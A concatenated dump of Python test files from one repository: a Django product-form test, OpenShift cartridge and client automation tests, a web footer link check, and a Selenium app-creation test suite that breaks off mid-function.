These will pass\nwhen you run \"manage.py test\".\n\nReplace this with more appropriate tests for your application.\n\"\"\"\n\nfrom django.test import TestCase\nfrom forms import ProductForm\n\n\nclass SimpleTest(TestCase):\n    def test_basic_addition(self):\n        \"\"\"\n        Tests that 1 + 1 always equals 2.\n        \"\"\"\n        self.assertEqual(1 + 1, 2)\n\nclass ProductTest(TestCase):\n    def setUp(self):\n        \"\"\"initialization\"\"\"\n        self.product = {\n            'title': 'My Book Title',\n            'description': 'yyy',\n            'image_url': 'http://google.com/logo.png',\n            'price': 1,\n            'date_available': '2012-12-12'\n        }\n\n        f = ProductForm(self.product)\n        f.save()\n        self.product['title'] = 'My Another Book Title'\n\n    def test_attrs_cannot_empty(self):\n        \"\"\"title, description, price, image_url cannot be empty\"\"\"\n        f = ProductForm({})\n        self.assertFalse(f.is_valid())\n        self.assertTrue(f['title'].errors)\n        self.assertTrue(f['description'].errors)\n        self.assertTrue(f['price'].errors)\n        self.assertTrue(f['image_url'].errors)\n        self.assertTrue(f['date_available'].errors)\n\n    def test_price_positive(self):\n        \"\"\"price must be greater than 0\"\"\"\n        f = ProductForm(self.product)\n        self.assertTrue(f.is_valid())\n\n        self.product['price'] = 0\n        f = ProductForm(self.product)\n        self.assertFalse(f.is_valid())\n        \n        self.product['price'] = -1\n        f = ProductForm(self.product)\n        self.assertFalse(f.is_valid())\n\n        self.product['price'] = 1\n\n    def test_image_url_endswith(self):\n        \"\"\"image_url must end with jpg, png or gif, case-insensitive\"\"\"\n        url_base = 'http://google.com/'\n        oks = ('fred.gif', 'fred.jpg', 'fred.png', 'FRED.JPG', 'FRED.Jpg')\n        bads = ('fred.doc', 'fred.gif/more', 'fred.gif.more')\n        for endwith in oks:\n            self.product['image_url'] = url_base + endwith\n            f = ProductForm(self.product)\n            self.assertTrue(f.is_valid(), \\\n                msg='error when image_url ends with '+endwith)\n        for endwith in bads:\n            self.product['image_url'] = url_base + endwith\n            f = ProductForm(self.product)\n            self.assertFalse(f.is_valid(), \\\n                msg='error when image_url ends with '+endwith)\n\n        self.product['image_url'] = 'http://google.com/logo.png'\n\n    def test_title_unique(self):\n        \"\"\"title must be unique\"\"\"\n        self.product['title'] = 'My Book Title'\n        f = ProductForm(self.product)\n        self.assertFalse(f.is_valid())\n        self.product['title'] = 'My Another Book Title'\n" }, { "alpha_fraction": 0.5824474096298218, "alphanum_fraction": 0.5928522944450378, "avg_line_length": 33.80315017700195, "blob_id": "2f80a2f6ded1968d70704cca3f609824ccd62e66", "content_id": "dd3d9e1eed40837e1dfc9cd7eb39347ec2ae6380", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4421, "license_type": "no_license", "max_line_length": 126, "num_lines": 127, "path": "/automation/open/testmodules/RT/cartridge/rockmongo_after_alter_namespace.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\"\"\"\nLinqing Lu\[email protected]\nDec 12, 2011\n\n[US1545][BusinessIntegration][embed_web_interface]use rockmongo after alter domain namespace \nhttps://tcms.engineering.redhat.com/case/123975/\n\"\"\"\n\nimport os,sys,re,random,string\nimport testcase,common,OSConf\nimport rhtest\n\nclass OpenShiftTest(rhtest.Test):\n    INTERACTIVE = False\n\n    def initialize(self):\n        self.summary = \"[US1545][BusinessIntegration][embed_web_interface]use rockmongo after alter domain namespace\"\n        try:\n            self.test_variant = self.config.test_variant\n        except:\n            self.info(\"Missing OPENSHIFT_test_name - used `python` as default\")\n            
self.test_variant = 'python'\n\n self.app_name = common.getRandomString(14)\n self.domain_name = common.get_domain_name()\n self.new_domain_name = common.getRandomString(10)\n self.app_type = common.app_types[self.test_variant]\n self.steps_list = []\n\n common.env_setup()\n\n def finalize(self):\n pass\n\nclass RockmongoAfterAlterNamespace(OpenShiftTest):\n\n def test_method(self):\n #1\n self.steps_list.append(testcase.TestCaseStep(\n \"Create an %s app: %s\" % (self.app_type, self.app_name),\n common.create_app,\n function_parameters = [self.app_name, self.app_type],\n expect_description = \"App should be created successfully\",\n expect_return = 0))\n\n #2\n self.steps_list.append(testcase.TestCaseStep(\"Alter the domain name\",\n common.alter_domain,\n function_parameters=[self.new_domain_name, \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd],\n expect_description=\"Domain was altered successfully\",\n expect_return=0))\n\n #3\n self.steps_list.append(testcase.TestCaseStep(\n \"embed mongodb into app %s\"% self.app_name,\n common.embed,\n function_parameters = [self.app_name, \"add-%s\"%common.cartridge_types['mongodb']],\n expect_return = 0))\n\n #4\n self.steps_list.append(testcase.TestCaseStep(\n \"embed rockmongo into app %s\"% self.app_name,\n common.embed,\n function_parameters = [self.app_name, \"add-%s\"%common.cartridge_types['rockmongo']],\n expect_return = 0))\n\n #5\n self.steps_list.append(testcase.TestCaseStep(\n \"check whether rockmongo working\",\n self.check_rockmongo,\n expect_return = 0))\n\n #6\n self.steps_list.append(testcase.TestCaseStep(\"Alter the domain name\",\n common.alter_domain,\n function_parameters=[self.domain_name, \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd],\n expect_description=\"Domain was altered successfully\",\n expect_return=0))\n\n #7\n self.steps_list.append(testcase.TestCaseStep(\n \"check whether rockmongo working\",\n self.check_rockmongo,\n expect_return = 0))\n\n\n case = testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n def check_rockmongo(self, negative = False):\n keyword = \"RockMongo\"\n if negative:\n keyword = \"503 Service Temporarily Unavailable\"\n url = OSConf.get_embed_info(self.app_name, common.cartridge_types[\"rockmongo\"], \"url\")+\"/index.php?action=login.index\"\n ret = common.grep_web_page(url, keyword, options=\"-k -H 'Pragma: no-cache'\", delay=5, count=10)\n os.system(\"curl -k -H 'Pragma: no-cache' %s\"% url)\n return ret\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(RockmongoAfterAlterNamespace)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.47045764327049255, "alphanum_fraction": 0.4786543846130371, "avg_line_length": 38.3020133972168, "blob_id": "5ea3228e0482f3fd61196ccbd059f3ed5084ae6b", "content_id": "3a957d5a503e1a69730ad0906c57e5ceb992fa70", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5856, "license_type": "no_license", "max_line_length": 101, "num_lines": 149, "path": 
"/automation/open/testmodules/RT/client/thread_dump_ruby_client.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport re\n\nimport common\nimport proc\nimport rhtest\n\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n supported_variants = [\"jbossas\", \"ruby\", \"ruby-1.9\"]\n self.info(\"[US1413][UI]Generate thread dump for jboss app from ruby client\")\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n try:\n self.variant = self.get_variant()\n except:\n self.variant = 'jbossas'\n\n if self.variant not in supported_variants:\n raise rhtest.TestSuiteAbort(\"Unsupported test variant: %s\"%self.variant)\n\n self.app_type = common.app_types[self.variant]\n self.info(\"VARIANT: %s\"%self.variant)\n self.app_name = common.getRandomString(10)\n common.env_setup()\n\n def finalize(self):\n self.info(\"Killing subprocess: rhc tail\")\n #self.p.print_output()\n self.p.kill()\n\n\nclass ThreadDumpRubyClient(OpenShiftTest):\n def create_proc(self, cmd):\n self.p = proc.Proc(cmd)\n return 0\n\n def test_method(self):\n # 1.Create an app\n (retcode, output) = rhtest.TestStep(self,\n \"1. Create a %s app\"%self.variant,\n common.create_app,\n function_parameters=[self.app_name, \n self.app_type, \n self.user_email, \n self.user_passwd],\n expect_description=\"the app should be created successfully\",\n expect_return=0)()\n\n # 2.Create thread dump log file\n (retcode, output) = rhtest.TestStep(self,\n \"2.Create thread dump log file\",\n \"rhc threaddump %s -l %s -p '%s' %s\" % (self.app_name, \n self.user_email, \n self.user_passwd,\n common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_description=\"the app should be created successfully\",\n expect_return=0,\n expect_str = [\"RESULT:\\nSuccess\"])()\n\n # 3.Use rhc tail to tail thread dump log file in a subprocess\n try:\n obj = re.search(r\"The thread dump file.* -f ([^\\s]+)\", output)\n logfile = obj.group(1)\n except:\n return self.abort(\"Unable to find logfile from recent stdout\")\n cmd = \"stdbuf -o0 rhc tail %s -l %s -p '%s' -f %s -o '-n +1' %s\" %(self.app_name, \n self.user_email, \n self.user_passwd, \n logfile,\n common.RHTEST_RHC_CLIENT_OPTIONS)\n (retcode, output) = rhtest.TestStep(self,\n \"3.Run 'rhc tail' in a subprocess\",\n self.create_proc,\n function_parameters=[cmd],\n expect_return = 0,\n expect_description=\"'rhc tail' should be started\")()\n\n # 4.Check the output\n if self.variant == 'jbossas':\n regex = [\"DeploymentScanner-threads\",\n \"Periodic Recovery\",\n \"Transaction Reaper\"]\n elif self.variant in (\"ruby\", \"ruby-1.9\"):\n regex = [\"Current thread\", \n \"backtrace dump\"]\n\n for r in regex:\n (retcode, output) = rhtest.TestStep(self,\n \"4.Check the output\",\n self.p.grep_output,\n function_parameters=[r, 3, 5, 0, False],\n expect_description=\"'%s' should be found in the output\" % (r),\n expect_return=0)()\n\n # 5.Check the output\n if self.variant == 'jbossas':\n regex = \"DestroyJavaVM\"\n\n (retcode, output) = rhtest.TestStep(self,\n \"5.Check the output\",\n self.p.grep_output,\n function_parameters=[regex, 3, 5, 0, False],\n expect_description=\"'%s' should be found in the output\" % (regex),\n expect_return=0)()\n\n # 8.Restart the app\n (retcode, output) = rhtest.TestStep(self,\n \"6.Restart the app\",\n \"rhc app restart %s -l %s -p '%s' %s\" % (self.app_name,\n self.user_email, \n self.user_passwd,\n common.RHTEST_RHC_CLIENT_OPTIONS),\n 
expect_description=\"App should be restarted\",\n expect_return=0)()\n\n # 9.Check the output\n if self.variant == 'jbossas':\n common.sleep(30)\n #regex = \"CORBA Naming Service started\"\n regex = [\"ORB Run Thread\"]\n elif self.variant in (\"ruby\", \"ruby-1.9\"):\n regex = [\"spawn_rack_application\",\n \"spawn_application\"]\n for r in regex:\n (retcode, output)= rhtest.TestStep(self,\n \"7.Check the output\",\n self.p.grep_output,\n function_parameters=[r, 3, 5, 0],\n expect_description=\"'%s' should be found in the output\" % (r),\n expect_return=0)()\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(ThreadDumpRubyClient)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5395243763923645, "alphanum_fraction": 0.5548131465911865, "avg_line_length": 37.72368240356445, "blob_id": "7c2bfaed8fad4152994399422b496655ed7cb58d", "content_id": "58798ff44278fa72cfc82698e8a9ae15d0504ced", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8830, "license_type": "no_license", "max_line_length": 145, "num_lines": 228, "path": "/automation/open/testmodules/UI/web/case_122222.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_122222.py\n# Date: 2012/07/03 10:56\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\n\nclass CheckHomeFooter(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n web.go_to_home()\n \n #Assert all the elements of footer \n web.assert_text_equal_by_xpath('DEVELOPERS',\n '''//div[@id='footer-nav']/div/div/nav/header/h3/a''')\n web.assert_text_equal_by_xpath('Get Started',\n '''//div[@id='footer-nav']/div/div/nav/ul/li/a''')\n web.assert_text_equal_by_xpath('User Guide',\n '''//div[@id='footer-nav']/div/div/nav/ul/li[2]/a''')\n web.assert_text_equal_by_xpath('FAQ',\n '''//div[@id='footer-nav']/div/div/nav/ul/li[3]/a''')\n web.assert_text_equal_by_xpath('Pricing',\n '''//div[@id='footer-nav']/div/div/nav/ul/li[4]/a''')\n web.assert_text_equal_by_xpath('''COMMUNITY''',\n '''//div[@id='footer-nav']/div/div/nav[2]/header/h3/a''')\n web.assert_text_equal_by_xpath('Blog',\n '''//div[@id='footer-nav']/div/div/nav[2]/ul/li/a''')\n web.assert_text_equal_by_xpath('''Forum''',\n '''//div[@id='footer-nav']/div/div/nav[2]/ul/li[2]/a''')\n web.assert_text_equal_by_xpath('IRC Channel',\n '''//div[@id='footer-nav']/div/div/nav[2]/ul/li[3]/a''')\n web.assert_text_equal_by_xpath('Feedback',\n '''//div[@id='footer-nav']/div/div/nav[2]/ul/li[4]/a''')\n web.assert_text_equal_by_xpath('GET INVOLVED',\n '''//div[@id='footer-nav']/div/div/nav[3]/header/h3/a''')\n web.assert_text_equal_by_xpath('Open Source',\n '''//div[@id='footer-nav']/div/div/nav[3]/ul/li/a''')\n web.assert_text_equal_by_xpath('Make it Better',\n '''//div[@id='footer-nav']/div/div/nav[3]/ul/li[2]/a''')\n web.assert_text_equal_by_xpath('OpenShift on GitHub',\n '''//div[@id='footer-nav']/div/div/nav[3]/ul/li[3]/a''')\n web.assert_text_equal_by_xpath('Newsletter sign up',\n '''//div[@id='footer-nav']/div/div/nav[3]/ul/li[4]/a''')\n web.assert_text_equal_by_xpath('''ACCOUNT''',\n '''//div[@id='footer-nav']/div/div/nav[4]/header/h3/a''')\n web.assert_text_equal_by_xpath('Terms of 
Service',\n '''//div[@id='footer-nav']/div/div/nav[4]/ul/li/a''')\n web.assert_text_equal_by_xpath('Privacy Policy',\n '''//div[@id='footer-nav']/div/div/nav[4]/ul/li[2]/a''')\n web.assert_text_equal_by_xpath('Security Policy',\n '''//div[@id='footer-nav']/div/div/nav[4]/ul/li[3]/a''') \n web.assert_text_equal_by_xpath('Plans',\n '''//div[@id='footer-nav']/div/div/nav[4]/ul/li[4]/a''') \n\n #check all the links of footer\n #DEVELOPERS\n web.click_element_by_xpath('''//div[@id='footer-nav']/div/div/nav/header/h3/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('Developer Center',\n '''//div[@id='content']/div/div/div/div[3]/div/h1/div''',\n 'Developers page is missing')\n\n #GET STARTED\n web.click_element_by_xpath('''//div[@id='footer-nav']/div/div/nav/ul/li/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('Get Started with OpenShift',\n '''/html/body/div[@id='content']/div/div/div/div/div/h1''',\n '`LEARN MORE` page is missing')\n\n\n\n #User Guide\n #web.go_to_home()\n #web.click_element_by_xpath('''//div[@id='footer-nav']/div/div/nav/ul/li[2]/a''')\n #time.sleep(2)\n #web.assert_text_equal_by_xpath('User Guide',\n # '''//div[@id='id1407351']/div/div/div[2]/h1''',\n # 'User Guide is missing')\n\n #FAQ\n web.go_to_home()\n web.click_element_by_xpath('''//div[@id='footer-nav']/div/div/nav/ul/li[3]/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('Frequently Asked Questions',\n '''/html/body/div[@id='content']/div/div/div/div[3]/div/h1/div''','FAQ is missing')\n\n #Pricing\n web.go_to_home()\n web.click_element_by_xpath(\"//div[@id='footer-nav']/div/div/nav/ul/li[4]/a\")\n time.sleep(2)\n web.assert_text_equal_by_xpath('Pricing','''/html/body/div[@id='content']/div/div/div/div[3]/div/h1/div''','Get Started page is missing')\n\n #COMMUNITY\n web.go_to_home()\n web.click_element_by_xpath('''//div[@id='footer-nav']/div/div/nav[2]/header/h3/a''')\n web.sleep(5)\n web.assert_text_equal_by_xpath('Welcome to OpenShift',\n '''//div[@id='content']/div/div/div/div[3]/div/h1/div[1]''',\n 'Community page is missing')\n\n #Blog\n web.go_to_home()\n web.click_element_by_xpath('''//div[@id='footer-nav']/div/div/nav[2]/ul/li/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('OpenShift Blog',\n '''//div[@id='content']/div/div/div/div[3]/div/h1/div''',\n 'Blog page is missing')\n\n #Forum\n web.go_to_home()\n web.click_element_by_xpath('''//div[@id='footer-nav']/div/div/nav[2]/ul/li[2]/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('Forums',\n '''//div[@id='content']/div/div/div/div[3]/div/h1/div''',\n 'Forums page is missing')\n \n #IRC Channel\n web.go_to_home()\n web.click_element_by_xpath('''//div[@id='footer-nav']/div/div/nav[2]/ul/li[3]/a''')\n time.sleep(5)\n web.check_title(\"Connection details - freenode Web IRC\")\n\n\n\n #GET INVOLVED\n web.go_to_home()\n web.click_element_by_xpath('''//div[@id='footer-nav']/div/div/nav[3]/header/h3/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('Get Involved',\n '''//div[@id='content']/div/div/div/div[3]/div/h1/div''',\n 'Get Involved page is missing')\n \n #Open Source\n web.go_to_home()\n web.click_element_by_xpath('''//div[@id='footer-nav']/div/div/nav[3]/ul/li/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('OpenShift is Open Source',\n '''//div[@id='content']/div/div/div/div[3]/div/h1/div''',\n 'Open Source page is missing')\n \n #Make it better\n web.go_to_home()\n web.click_element_by_xpath('''//div[@id='footer-nav']/div/div/nav[3]/ul/li[2]/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('Get Involved 
with OpenShift',\n '''//div[@id='content']/div/div/div/div[3]/div/h1/div''',\n 'Get Involved with Openshift page is missing')\n\n #OpenShift on GitHub\n web.go_to_home()\n web.click_element_by_xpath('''//div[@id='footer-nav']/div/div/nav[3]/ul/li[3]/a''')\n time.sleep(2)\n web.assert_element_present_by_link_text(\"crankcase\")\n\n #Newsletter Sign Up\n web.go_to_home()\n web.click_element_by_xpath('''//div[@id='footer-nav']/div/div/nav[3]/ul/li[4]/a''')\n time.sleep(2)\n web.check_title(\"OpenShift Newsletter Signup\")\n \n #ACCOUNT\n web.go_to_home()\n web.click_element_by_xpath('''//div[@id='footer-nav']/div/div/nav[4]/header/h3/a''')\n time.sleep(2)\n web.check_title(\"Sign in to OpenShift | OpenShift by Red Hat\")\n \n #Terms of service\n web.go_to_home()\n web.click_element_by_xpath('''//div[@id='footer-nav']/div/div/nav[4]/ul/li/a''')\n time.sleep(2)\n web.check_title(\"Terms of Use | OpenShift by Red Hat\")\n\n #Privacy Policy\n web.go_to_home()\n web.click_element_by_xpath('''//div[@id='footer-nav']/div/div/nav[4]/ul/li[2]/a''')\n time.sleep(2)\n web.check_title(\"OpenShift Privacy Statement | OpenShift by Red Hat\")\n\n #Security Policy\n web.go_to_home()\n web.click_element_by_xpath('''//div[@id='footer-nav']/div/div/nav[4]/ul/li[3]/a''')\n time.sleep(5)\n web.check_title(\"Security Information | OpenShift by Red Hat\")\n\n #Plans\n web.go_to_home()\n web.click_element_by_xpath('''//div[@id='footer-nav']/div/div/nav[4]/ul/li[4]/a''')\n time.sleep(5)\n web.check_title(\"Pricing | OpenShift by Red Hat\")\n\n self.tearDown()\n\n return self.passed(\"Case 122222 test passed.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(CheckHomeFooter)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of CheckHomeContent.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6374593377113342, "alphanum_fraction": 0.6438030004501343, "avg_line_length": 48.070037841796875, "blob_id": "034fd38596c05c94e5417fbda42b256591d3359b", "content_id": "44069e1aa3286221cb7c66d20835d01a7d11f42f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12611, "license_type": "no_license", "max_line_length": 192, "num_lines": 257, "path": "/automation/open/testmodules/UI/web/tc_createapp.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.common.exceptions import NoSuchElementException\nimport unittest, time, re\nimport baseutils\nimport config\nimport random\nimport HTMLTestRunner\n\n\nclass CreateApplication(unittest.TestCase):\n def setUp(self):\n self.driver = \"\"\n self.base_url = \"\"\n self.profile = \"\"\n self.verificationErrors = []\n self.exist_app=\"mypythonapp1\"\n baseutils.initiate(self)\n\n\n\n def get_domain_name(self):\n return self.driver.find_element_by_css_selector(\"div.current.domain\").text\n\n def generate_app_name(self):\n i=random.uniform(1,10)\n app_name=\"app\"+str(i)[5:10]\n return app_name\n\n def get_cartridge_list(self,id_name=\"express_app_cartridge\"):\n select=self.driver.find_element_by_id(id_name)\n options = select.find_elements_by_tag_name(\"option\")\n return options\n\n def assert_app_url(self,appname):\n _domain_name=self.get_domain_name()\n 
_app_url=\"http://\"+appname+\"-\"+_domain_name+\".\"+config.libra_server\n print \"=========================\"\n print _app_url\n baseutils.assert_element_present_by_link_text(self,_app_url)\n #baseutils.assert_text_equal_by_partial_link_text(self,_app_url,\"http://\"+appname+\"-\")\n\n def assert_app_url_after_change(self,appname,_new_domain):\n _app_url=\"http://\"+appname+\"-\"+_new_domain+\".\"+config.libra_server\n print \"=========================\"\n print _app_url\n baseutils.assert_element_present_by_link_text(self,_app_url)\n\n\n def create_application(self,app_name,cartridge_type):\n baseutils.go_to_home(self)\n time.sleep(4)\n baseutils.go_to_signin(self)\n baseutils.login(self,config.domainuser[0],config.domainuser[1])\n baseutils.go_to_express_console(self)\n baseutils.scroll_bar(self)\n #VerifyDomainExist\n time.sleep(10)\n # baseutils.assert_element_present_by_id(self,\"show_namespace\")\n # self.driver.refresh()\n # self.driver.refresh()\n baseutils.wait_element_present_by_id(self,\"express_app_app_name\")\n self.driver.find_element_by_id(\"express_app_app_name\").clear()\n self.driver.find_element_by_id(\"express_app_app_name\").send_keys(app_name)\n cartridges=self.get_cartridge_list()\n self.assertTrue(len(cartridges) >= 5)\n for car in cartridges:\n if car.text == cartridge_type or car.text.find(cartridge_type) != -1:\n car.click()\n break\n #baseutils.click_element_by_xpath(self,\"//body/section/div/div[2]/div[2]/div[1]/div[1]/form[1]/fieldset[1]/ol[1]/li[1]/input[@id='express_app_submit']\")\n #self.driver.find_element_by_id(\"express_app_submit\").click()\n time.sleep(2)\n baseutils.scroll_bar(self)\n time.sleep(1)\n baseutils.click_element_by_id(self,\"express_app_submit\")\n\n def delete_application(self):\n# baseutils.go_to_home(self)\n time.sleep(4)\n# baseutils.go_to_signin(self)\n# baseutils.login(self,config.domainuser[0],config.domainuser[1])\n baseutils.go_to_express_console(self)\n baseutils.scroll_bar(self)\n appname=self.driver.find_element_by_xpath(\"//div[@id='app_list_container']/ul/li/header/h1\").text\n print appname\n baseutils.click_element_by_link_text(self,\"Delete...\") \n# baseutils.assert_element_present_by_xpath(self,\"//div[@id='app_list_container']/ul/li/div/div/a\")\n# self.driver.find_element_by_xpath(\"//div[@id='app_list_container']/ul/li/div/div/a\").click() \n time.sleep(3)\n baseutils.wait_element_present_by_xpath(self,\"//form[@id='\"+appname+\"_delete_form']/input[3]\")\n baseutils.click_element_by_xpath(self,\"//form[@id='\"+appname+\"_delete_form']/input[3]\")\n time.sleep(15)\n baseutils.wait_element_not_present_by_xpath(self,\"//div[@id='app_list_container']/ul/li[5]/header/h1\")\n \n def test_a_create_app_with_blank_appname(self):\n self.create_application(\"\",\"jbossas\")\n time.sleep(2)\n baseutils.assert_contain_text_by_xpath(self,\"THIS FIELD IS REQUIRED.\",\"//li[@id='express_app_app_name_input']/label[2]\")\n\n #baseutils.assert_text_equal_by_css(self,\"App name is invalid; App name can't be blank\",\"div.message.error\")\n \n def test_b_create_app_with_nonalphnum_appname(self):\n self.create_application(\"app_1\",\"jbossas-7.0\")\n time.sleep(2)\n baseutils.assert_text_equal_by_xpath(self,\"ONLY LETTERS AND NUMBERS ARE ALLOWED\",\".//li[@id='express_app_app_name_input']/label[2]\")\n \n \n def test_c_create_app_with_blank_cart(self):\n self.create_application(\"myapp\",\"\")\n time.sleep(2)\n baseutils.assert_contain_text_by_xpath(self,\"THIS FIELD IS 
REQUIRED.\",\"//li[@id='express_app_cartridge_input']/label[2]\")\n \n \n def test_d_create_app_with_blacklist_appname(self):\n self.create_application(\"openshift\",\"perl-5.10\")\n time.sleep(2)\n baseutils.assert_text_equal_by_css(self,\"App name openshift is not a permitted app name\",\"div.error.message\")\n \n def test_e_create_app_with_blankapp_blankcart(self):\n self.create_application(\"\",\"\")\n time.sleep(2)\n baseutils.assert_contain_text_by_xpath(self,\"THIS FIELD IS REQUIRED.\",\"//li[@id='express_app_app_name_input']/label[2]\")\n baseutils.assert_contain_text_by_xpath(self,\"THIS FIELD IS REQUIRED.\",\"//li[@id='express_app_cartridge_input']/label[2]\")\n\n #baseutils.assert_text_equal_by_css(self,\"App name is invalid; App name can't be blank; Cartridge can't be blank; Cartridge is not a valid cartridge.\",\"div.message.error\") \n \n def test_f_create_jboss_app(self):\n _appname=self.generate_app_name()\n self.create_application(_appname,\"jbossas\")\n time.sleep(20)\n # baseutils.is_element_displayed(self,By.ID,\"spinner\")\n # baseutils.assert_text_equal_by_id(self,\"Creating your app...\",\"spinner-text\")\n self.assert_app_url(_appname)\n # if baseutils.is_text_displayed (self,\"We're sorry, this operation has timed out. It is possible that it was succfully completed, but we are unable to verify it.\",\"div.error.message\"):\n # pass\n # else:\n # baseutils.assert_contain_text_by_id(self,\"using Java with JBossAS 7 on OpenShift:\",\"spinner-text\")\n # baseutils.click_element_by_css_no_wait(self,\"a.close > img\")\n # baseutils.wait_element_not_displayed_by_id(self,\"spinner\")\n self.assert_app_url(_appname)\n self.delete_application()\n \n def test_g_create_perl_app(self):\n _appname=self.generate_app_name()\n self.create_application(_appname,\"perl\")\n time.sleep(20)\n #baseutils.is_element_displayed(self,By.ID,\"spinner\")\n #baseutils.assert_text_equal_by_id(self,\"Creating your app...\",\"spinner-text\")\n #time.sleep(5)\n #if baseutils.is_text_displayed (self,\"We're sorry, this operation has timed out. It is possible that it was succfully completed, but we are unable to verify it.\",\"div.error.message\"):\n # pass\n #else:\n #baseutils.assert_contain_text_by_id(self,\"OpenShift Perl app\",\"spinner-text\")\n #baseutils.click_element_by_css_no_wait(self,\"a.close > img\")\n #baseutils.wait_element_not_displayed_by_id(self,\"spinner\")\n self.assert_app_url(_appname)\n self.delete_application()\n \n def test_h_create_ruby_app(self):\n _appname=self.generate_app_name()\n self.create_application(_appname,\"rack\")\n time.sleep(20)\n #baseutils.is_element_displayed(self,By.ID,\"spinner\")\n #baseutils.assert_text_equal_by_id(self,\"Creating your app...\",\"spinner-text\")\n #time.sleep(5)\n #if self.driver.find_element_by_css_selector(\"div.error.message\").is_displayed():\n # self.driver.refresh()\n #else:\n #baseutils.assert_contain_text_by_id(self,\"popular Ruby frameworks on OpenShift\",\"spinner-text\")\n #baseutils.click_element_by_css_no_wait(self,\"a.close > img\") \n #if baseutils.is_text_displayed (self,\"We're sorry, this operation has timed out. 
It is possible that it was succfully completed, but we are unable to verify it.\",\"div.message.error\"):\n # pass\n #else:\n #baseutils.assert_contain_text_by_id(self,\"popular Ruby frameworks on OpenShift\",\"spinner-text\")\n #baseutils.click_element_by_css_no_wait(self,\"a.close > img\")\n #baseutils.wait_element_not_displayed_by_id(self,\"spinner\")\n self.assert_app_url(_appname)\n self.delete_application()\n \n def test_i_create_python_app(self):\n _appname=self.generate_app_name()\n # self.exist_app=_appname\n self.create_application(_appname,\"wsgi\")\n time.sleep(20)\n #baseutils.is_element_displayed(self,By.ID,\"spinner\")\n #baseutils.assert_text_equal_by_id(self,\"Creating your app...\",\"spinner-text\")\n #time.sleep(5)baseutils.click_element_by_xpath(self,\"//div[@id='domains']/div[2]/div[2]/div/a\")\n #if baseutils.is_text_displayed (self,\"We're sorry, this operation has timed out. It is possible that it was succfully completed, but we are unable to verify it.\",\"div.message.error\"):\n # pass\n #else:\n #baseutils.assert_contain_text_by_id(self,\"deploy popular python frameworks\",\"spinner-text\")\n #baseutils.click_element_by_css_no_wait(self,\"a.close > img\")\n #baseutils.wait_element_not_displayed_by_id(self,\"spinner\")\n self.assert_app_url(_appname)\n self.delete_application()\n\n \n def test_j_create_php_app(self):\n _appname=self.generate_app_name()\n self.create_application(_appname,\"php\")\n time.sleep(20)\n #baseutils.is_element_displayed(self,By.ID,\"spinner\")\n #baseutils.assert_text_equal_by_id(self,\"Creating your app...\",\"spinner-text\")\n #time.sleep(5)\n #if baseutils.is_text_displayed (self,\"We're sorry, this operation has timed out. It is possible that it was succfully completed, but we are unable to verify it.\",\"div.message.error\"):\n # pass\n #else:\n #baseutils.assert_contain_text_by_id(self,\"OpenShift PHP app\",\"spinner-text\")\n #baseutils.click_element_by_css_no_wait(self,\"a.close > img\")\n #baseutils.wait_element_not_displayed_by_id(self,\"spinner\")\n self.assert_app_url(_appname)\n self.delete_application()\n '''\n def test_k_check_url_after_changedomain(self):\n baseutils.go_to_home(self)\n time.sleep(4)\n baseutils.go_to_signin(self)\n baseutils.login(self,config.domainuser[0],config.domainuser[1])\n baseutils.go_to_express_console(self)\n baseutils.scroll_bar(self)\n #baseutils.click_element_by_xpath(self,\"//*[@id='domain_form_replacement']/a\")\n 